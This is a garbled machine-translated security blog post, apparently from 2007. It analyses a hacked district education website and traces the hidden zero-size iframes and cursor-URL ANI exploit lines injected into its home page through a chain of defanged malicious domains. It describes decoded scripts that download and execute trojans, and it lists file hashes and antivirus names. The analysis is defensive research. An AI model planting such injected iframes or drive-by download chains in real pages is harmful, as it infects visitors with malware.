The Education Information Network of Hexi district of a city has been upgraded to the Trojan technology demonstration platform of previous generations.

EndurerOriginal

1Version

Previously, this network was added to spread code such as worm. win32.viking. Jr. For details, refer:

A certain Hexi District Education Information Network was added to spread code such as worm. win32.viking. Jr.
Http://endurer.bokee.com/6186405.html
Http://blog.csdn.net/Purpleendurer/archive/2007/03/26/1542040.aspx
Http://blog.sina.com.cn/u/49926d910100082w

Just now I made a transfer and found that there has been "upgraded" into a trojan technology demonstration platform of history, from adding redundant spaces, using escape () encryption and other simple methods, to us-ASCII and ani vulnerabilities.

Code found at the end of the Home Page:
/---
<IFRAME src = "hxxp: // W ***. Q ** B * B ** d.com/bd?##.htm? 001 "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // www. M *** M * ju.net/bbs/tj?##.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe> <IFRAME src =" hxxp: // IDC **. ki * s *** 163.com/index.html? Id = hagk "width =" 0 "Height =" 0 "> </iframe>
<IFRAME src = hxxp: // www. hao123 *** hao123 *. CN/OK ***/index.htm width = 0 Height = 0> </iframe> <IFRAME src = hxxp: // www. X ** 4*5*4 **. CN/width = 100 Height = 0 frameborder = 0> </iframe> <IFRAME src = hxxp: // www. X ** 4*5*4 **. CN/width = 100 Height = 0 frameborder = 0> </iframe> <IFRAME src = hxxp: // www. X ** 4*5*4 **. CN/width = 100 Height = 0 frameborder = 0> </iframe>
<IFRAME src = hxxp: // QQ ***. H * 1 *** 48.cn/ width = 100 Height = 0 frameborder = 0> </iframe>
---/

Hxxp: // W ***. Q ** B * B ** d.com/bd?##.htm? 001Code included:
/---
<Body style = 'cursor: URL (hxxp: // s ***. g * C *** uj.com/t.js) '>

<IFRAME src = "hxxp: // s ***. g * C *** uj.com/1.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

T. js uses the ani vulnerability to download 0.exe

File Description: D:/test/0.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time: 12:55:52
Access time: 12:56:53
Size: 36864 bytes, 36.0 KB
MD5: 03e68c72bb560cd19711afdebd63c73c

Kaspersky reportsWorm. win32.delf. BS

Hxxp: // s ***. g ** C *** uj.com/1.htmThe content is JavaScript code. The function is to use Unescape () to calculate the value of the variable words and output it.

The obtained words are VBScript code, which is used by Microsoft. XMLHTTP and scripting. fileSystemObject downloads the file 0.exe, saves it as install.com in the temporary ie folder, and uses shell. use the ShellExecute method of the Application Object Q.

Hxxp: // s ***. g ** C *** uj.com/bd.htm? 001And hxxp: // W ***. Q *** B ** d.com/bd?##.htm? 001 is the same.

Hxxp: // IDC **. Ki ** s ** 163.com/index.html? Id = hagkCode included:
/---
<SCRIPT src = CSS. js> </SCRIPT>
---/

Hxxp: // IDC **. Ki ** s ** 163.com/css.jsThe content is Javascript script code. The function is to use a custom function to decrypt the code and run it through eval.

The decrypted content is Javascript script code. The function is to download the file hxxp: // Bo * ol *** o * m.com/love.exe by using Microsoft. XMLHTTP and SCR using pting. FileSystemObject.

Be careful to send a website with 6 QQ numbers for free to spread worm. win32.viking. LJ/worm. Viking. sv
Http://endurer.bokee.com/6274049.html
Http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
Http://blog.sina.com.cn/u/49926d91010008pd

.

Hxxp: // www. hao123 *** hao123 *. CN/OK ***/index.htmCode included:
/---
<IFRAME src = "hxxp: // www. hao123 *** hao123 *. CN/BBS/1881.htm" width = "0" Height = "0" frameborder = "0"> </iframe>
---/

Hxxp: // www. hao123 *** hao123 *. CN/BBS/1881.htm contains the Code:
/---
<IFRAME src = "hxxp: // www. f * z *** zv.com/sousuo.htm" width = "0" Height = "0" frameborder = "0"> </iframe>
<IFRAME src = "hxxp: // www.955 *** 92 *** 2.cn/web.htm" width = "0" Height = "0" frameborder = "0"> </iframe>
<IFRAME src = "hxxp: // www. hao123 *** hao123 *. CN/"width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // www. I *** P *** 5 * 28.cn/ "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

Hxxp: // www. f * z *** zv.com/sousuo.htmCode included:
/---
<IFRAME src = "hxxp: // s ***. g ** C *** uj.com/bd.htm? 268001 "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

Hxxp: // s ***. g ** C *** uj.com/bd.htm? 268001Content and hxxp: // W ***. Q *** B ** d.com/bd?##.htm? 001 is the same.

Hxxp: // www.955 *** 92 *** 2.cn/web.htmCode included:
/---
<IFRAME src = hxxp: // www.1 ***** 8d *** M * m ***. com/dm/kehu0738.htm width = 0 Height = 0> </iframe>
---/

Hxxp: // www.1 ***** 8d *** M ***. com/dm/kehu0738.htmContains a string that uses US-ASCII encoding. To the http://purpleendurer.ys168.com download US-ASCII encryption, decryption program for decryption, the obtained content is:
/---
<HTML>
<Body>
<Div id = new_content_jp style = "display: none">
<Div style = "cursor: URL ('hxxp: // 1 ***** 8d *** M ** M ***. com/arp/1.jpg ')">
<Div style = "cursor: URL ('hxxp: // 1 ***** 8d ** M ***. COM/arp/2.jpg ') "> </div>
<Script language = JavaScript src = "hxxp: // 1 ***** 8d *** M ** M ***. com/arp/run. js"> </SCRIPT>
</Body>
<IFRAME src = hxxp: // www.1 ***** 8d *** M * m ***. com/arp/0614.htm width = 0 Height = 0> </iframe>
</Html>
---/

1. jpg and 2.jpg use the ani vulnerability to download down.exe

File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:15:51
Modification time: 13:17:39
Access time: 13:18:17
Size: 18944 bytes, 18.512 KB
MD5: c23c3fabe68fdadd14a89bf111f8bf2e

Kaspersky reportsTrojan-Downloader.Win32.Delf.bko

Hxxp: // 1 * 8d * m *. com/arp/run. jsThe function is to detect the browser type and version, and output the code that shows 1.jpg and 2.jpg.

Hxxp: // www.1 ***** 8d ** M * m ***. com/arp/0614.htmContains JavaScript and VBScript code.
/---
Do While Len (s)> 1
K = "& H" + ucase (left (S, 2 ))
P = clng (k)
M = CHR (P)
D = D & M
S = mymid (s)
Loop
---/
Decrypts the value of variable S and outputs it in the form of VBScript, JavaScript, or HTML according to the value of variable flag_type. Here, the flag_type value is "vbs", so the VBScript code is output, and the function is to use Microsoft. XMLHTTP and SCR accept pting. fileSystemObject downloads the file down.exe, saves it to the temporary ie folder, and creates down. vbs, and use shell. use the ShellExecute method of the Application Object Q.

Hxxp: // www. hao123 *** hao123 *. CN/Code included:
/---
<IFRAME src = hxxp: // www. S * en *** love.com/a?#/2.htm width = 50 height = 0> </iframe>
---/

Hxxp: // www. S * en *** love.com/a?#/2.htm contains the Code:
/---
<Div style = "cursor: URL ('hxxp: // www. S * en *** love.com/a?#/a.jpg')">
<Div style = "cursor: URL ('hxxp: // www. S * en *** love.com/a?#/ B .jpg') "> </div> </body> <IFRAME src1_v1.htm width = 0 Height = 0> </iframe>
---/
A.jpg and B .jpg use the ani vulnerability to download hxxp: // www. S * en *** love.com/a?#/2.exe

File Description: D:/test/2.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:23:35
Modification time: 13:24:28
Access time:
Size: 23030 bytes, 22.502 KB
MD5: b43b5493549c4f7658850bdbe41e8c4f

Kaspersky reportsTrojan-PSW.Win32.Delf.qc

Hxxp: // www. S * en *** love.com/a?#/v1.htmCode included:
/---
<SCRIPT src = 1.js> </SCRIPT>
---/

1. js cannot be opened and may no longer exist.

Hxxp: // www. I *** P *** 5 * 28.cn/Code included:
/---
<IFRAME src = hxxp: // www.08 ***** 3 ***** 25.cn/wm/xin4?##.htm? 110 width = 0 Height = 0> </iframe>
---/

Hxxp: // www.08 *** 3 *** 25.cn/wm/xin4?##.htm? 110Code included:
/---
<Body style = 'cursor: URL (hxxp: // www.08 ***** 3 ***** 25.cn/wm/d.jpg) '> </body>
</Html>
<SCRIPT src = hxxp: // www.08 ***** 3 ***** 25.cn/wm/0614.js> </SCRIPT>
---/

D.jpg uses the ani vulnerability to download hxxp: // www.08 ***** 3 ***** 25.cn/wm/down.exe

File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:42:49
Modification time: 13:43:54
Access time: 13:44:42
Size: 16619 bytes, 16.235 KB
MD5: a961822d4e5d96a4f2e58be91f83a450

Kaspersky reportsTrojan-Downloader.Win32.Delf.bkoAndWorm. win32.delf. BS

Hxxp: // www.08 ***** 3 ***** 25.cn/wm/0614.jsThe content is Javascript script code. The function is to use a custom function to decrypt the code and run it through eval.

The decrypted content is Javascript script code. The function is to download the down.exe file from Microsoft. XMLHTTP and SCR using pting. FileSystemObject and save it to % WINDIR %. The file name is defined by the function:
/---
Function Gn (n) {var number = math. Random () * n; return '~ TMP '+'. tmp ';}
---/
Generate, that is ~ TMP. tmp, and then run the command: % WINDIR %/system32/cmd.exe/C % WINDIR %/~ through the ShellExecute method of the shell. Application Object Q /~ TMP. tmp to run.

Hxxp: // www. x ** 4*5*4 **. CN/Code included:
/---
<IFRAME src = "hxxp: // qq.5 ** 20 s ** f.org/44251#/index.htm" width = "100" Height = "0"> </iframe>
<IFRAME src = hxxp: // qq.5 ** 20 s ** f.org/44251366#/06014.htm width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // www.5 *** 4 *** 6 *** 0379cn/index.htm" width = "100" Height = "0"> </iframe>
<IFRAME src = "hxxp: // www. m *** HK *** j52 *** 0.com/index.htm" width = "100" Height = "0"> </iframe>
---/

Hxxp: // qq.5 ** 20 s ** f.org/43661366#/index.htmCode included:
/---
<SCRIPT src = "hxxp: // qq.5 ** 20 s ** f.org/44251379/xjz2007.js"> </SCRIPT>
---/

Hxxp: // qq.5 ** 20 s ** f.org/43661366#/xjz2007.jsCode included:
/---
Document. writeln ("<IFRAME srcw.xjz2007.htm width = 0 Height = 0 frameborder = 0> <// IFRAME> ");
Document. writeln ("<Div style =/" cursor: URL (/'xjz2007.bmp/')/"> ");
Document. writeln ("</div> </body> ---/

Hxxp: // qq.5 ** 20 s ** f.org/410811080000/xjz2007.htmIt contains VBScript code, but it does not need to be decrypted, because the variable xinchunkuaile value has already shown that the downloaded file is 6xz.exe.

File Description: D:/test/6xz.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 13:45:23
Size: 22528 bytes, 22.0 KB
MD5: 410da0576768619b234adbda5ba06bc5

Kaspersky reportsDownloader. win32.small. EOR

Xjz2007.bmp uses the ani vulnerability to download 6xz.exe

Hxxp: // qq.5 ** 20 s ** f.org/410811080000/06014.htmContains many spaces. The function of JavaScript code is to use ADODB. stream, Microsoft. XMLHTTP and scripting. fileSystemObject downloads 6xz.exe, save it as ie.exe, and create IE. vbs, and use shell. use the ShellExecute method of the Application Object Q.
It also contains a custom function exploit ().

Hxxp: // www.5 ** 4*6 ** 0133 cn/index.htmCode included:
/---
<IFRAME src = "hxxp: // www. P *** um *** a163 ***. com/P *** U/709671697.htm? 56 "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
S "> </SCRIPT>
---/

Hxxp: // www. P *** um *** a163 ***. com/P *** U/709671697.htm? 56Code included:
/---
<SCRIPT src = 614.js> </SCRIPT>
---/

Hxxp: // www. P *** um *** a163 ***. com/P *** U/614. js content and

Be careful to send a website with 6 QQ numbers for free to spread worm. win32.viking. LJ/worm. Viking. sv
Http://endurer.bokee.com/6274049.html
Http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
Http://blog.sina.com.cn/u/49926d91010008pd

Download pu.exe.

Hxxp: // www. m *** HK *** j52 *** 0.com/index.htmCode included:
/---
<IFRAME src = hxxp: // www.08 ***** 3 ***** 25.cn/wm/xin16.htm width = 0 Height = 0> </iframe>
---/

Hxxp: // www.08 ***** 3 ***** 25.cn/wm/xin16.htmContent and hxxp: // www.08 ***** 3 ***** 25.cn/wm/xin4?#.htm? Same as 110.

Hxxp: // QQ *****. h ** 1 ***** 48.cn/Cannot open.